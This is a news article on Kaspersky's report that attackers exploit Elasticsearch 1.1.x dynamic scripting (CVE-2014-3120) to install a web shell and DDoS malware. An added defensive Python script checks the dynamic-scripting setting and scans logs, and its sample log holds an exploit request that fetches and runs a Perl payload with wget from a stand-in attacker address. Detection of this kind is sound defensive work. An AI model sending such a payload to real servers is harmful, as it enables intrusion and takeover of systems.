Security professionals usually don’t have to worry about the search engines their organizations choose for plowing through corporate data.
But researchers at Kaspersky Labs say attackers are exploiting a vulnerability in the open source Elasticsearch engine to install distributed denial of service (DDoS) malware on Amazon and possibly other cloud servers.
The problem lies in Elasticsearch version 1.1.x, which is exploited through its dynamic scripting feature. Users are urged to upgrade to version 1.2 or 1.3, which have dynamic scripting turned off by default.
Computerworld quotes a Kaspersky researcher as saying attackers break into virtual machines run by Amazon EC2 customers by exploiting the vulnerability in Elasticsearch 1.1.x.
The attackers re-purpose known CVE-2014-3120 proof-of-concept exploit code to deliver a Perl web shell, Kaspersky says. “Gaining this foothold presents the attacker with bash shell access on the server. The script ‘pack.pl’ is fetched with wget and saved from the web host above to /tmp/zerl and run from there, providing the bash shell access to the attacker. Events in your index logs may suggest your server has fallen to this attack,” says Kaspersky’s Kurt Baumgartner.
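The two defender-side checks the article points at, whether a 1.x node still allows dynamic scripting and whether request logs carry the traces Kaspersky describes (wget, pack.pl, /tmp/zerl), can be scripted. The following is an added example written for this page, not code from the article, Kaspersky or the Elasticsearch project. It assumes `script.disable_dynamic` as the elasticsearch.yml setting that governs dynamic scripting in the 1.x line, with the defaults the article states (on in 1.1.x, off from 1.2), and the log lines and config fragments are constructed samples in a hypothetical request-log format.

```python
import re
from typing import Dict, Iterable, List

# Indicators taken from the Kaspersky description quoted in the article:
# the attacker fetches "pack.pl" with wget, stores it at /tmp/zerl and runs it.
INDICATORS = ("wget", "pack.pl", "/tmp/zerl")

# A script field in a request body is only possible when dynamic scripting is
# allowed, so on a 1.1.x node every such request deserves review.
SCRIPT_MARKER = re.compile(r'"script(_fields)?"\s*:', re.IGNORECASE)

# Assumed 1.x setting name (elasticsearch.yml): script.disable_dynamic
SETTING = "script.disable_dynamic"


def dynamic_scripting_enabled(config_text: str, version: str) -> bool:
    """Return True if an Elasticsearch 1.x node allows dynamic scripting.

    An explicit setting wins; otherwise the default depends on the version,
    as the article describes: 1.1.x allows it, 1.2 and later turn it off.
    """
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == SETTING:
            return value.lower() != "true"
    major, minor = (int(p) for p in version.split(".")[:2])
    return (major, minor) < (1, 2)


def find_suspicious_events(log_lines: Iterable[str]) -> List[Dict[str, object]]:
    """Flag log lines that carry the article's indicators or a script request.

    severity "high": one or more of the known post-exploitation indicators.
    severity "review": a script field with no indicator (expected to be rare
    on a node that should not be accepting scripts at all).
    """
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_lines, 1):
        matched = [i for i in INDICATORS if i in line]
        scripted = bool(SCRIPT_MARKER.search(line))
        if not matched and not scripted:
            continue
        hits.append({
            "line": lineno,
            "severity": "high" if matched else "review",
            "indicators": matched,
            "script_request": scripted,
            "text": line,
        })
    return hits


# Constructed sample config fragments (not from any real deployment).
SAMPLE_CONFIG_11 = "cluster.name: prod\n# script.disable_dynamic not set\n"
SAMPLE_CONFIG_HARDENED = "cluster.name: prod\nscript.disable_dynamic: true\n"

# Constructed sample request-log lines; the format is hypothetical.
SAMPLE_LOG = [
    '2014-07-29 10:11:12 10.0.0.5 POST /_search source={"query":{"match_all":{}}}',
    '2014-07-29 10:11:40 203.0.113.9 POST /_search source={"script_fields":{"x":{"script":'
    '"wget http://203.0.113.9/pack.pl -O /tmp/zerl; perl /tmp/zerl"}}}',
    '2014-07-29 10:12:02 10.0.0.7 GET /logs-2014.07/_count',
    '2014-07-29 10:12:30 10.0.0.5 POST /_search source={"script_fields":{"s":{"script":"_score * 2"}}}',
]


if __name__ == "__main__":
    for cfg, ver in ((SAMPLE_CONFIG_11, "1.1.1"), (SAMPLE_CONFIG_HARDENED, "1.1.1")):
        state = "ENABLED" if dynamic_scripting_enabled(cfg, ver) else "disabled"
        print(f"version {ver}: dynamic scripting {state}")
    for hit in find_suspicious_events(SAMPLE_LOG):
        print(f"line {hit['line']} [{hit['severity']}] indicators={hit['indicators']}")
```

The config check reports a 1.1.x node with no explicit setting as exposed and the same node as safe once `script.disable_dynamic: true` is present; the log scan separates lines carrying the wget/pack.pl//tmp/zerl traces (high) from ordinary script requests that merely warrant a look (review).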
The result is a high flow of UDP traffic, he wrote in a blog post. The list of DDoS victims already includes a large regional U.S. bank, a large electronics maker and a service provider in Japan.